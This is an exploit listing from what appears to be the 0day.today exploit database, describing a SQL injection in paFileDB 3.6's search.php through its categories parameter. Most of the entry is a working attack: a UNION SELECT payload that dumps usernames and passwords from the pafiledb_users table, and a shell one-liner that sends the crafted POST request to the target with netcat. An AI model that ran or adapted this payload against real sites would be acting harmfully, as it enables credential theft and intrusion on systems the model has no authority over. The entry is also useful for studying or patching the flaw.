[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

paFileDB 3.6 (search.php) Remote SQL Injection Vulnerability

Author
pUm
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2027
Category
web applications
Date add
13-07-2007
Platform
unsorted
============================================================
paFileDB 3.6 (search.php) Remote SQL Injection Vulnerability
============================================================



Site: http://www.phparena.net/pafiledb
Description: SQL injection (categories) in includes/search.php
Code: $results = $db->GetArray("SELECT * FROM ".$dbPrefix."files WHERE (".$searchin.") AND file_catid IN (".implode(',',$_POST['categories']).")");

Comment:"ouuch"

SQL: ) UNION SELECT ALL null,user_username,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM (pafiledb_users

POC:
host="www.example.com"; echo -e "POST
http://$host/index.php?act=search&process HTTP/1.1\nHost:
$host\nContent-Length:
302\n\nquery=test&search_in[]=file_name&search_in[]=file_desc&search_in[]=file_longdesc&search_in[]=file_creator&search_in[]=file_version&categories[]=1)
UNION SELECT ALL
null,user_username,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null
FROM (pafiledb_users"| netcat $host 80

Vendor: was informed, but did not response yet...
credits: h4si & pUm



#  0day.today [2024-12-26]  #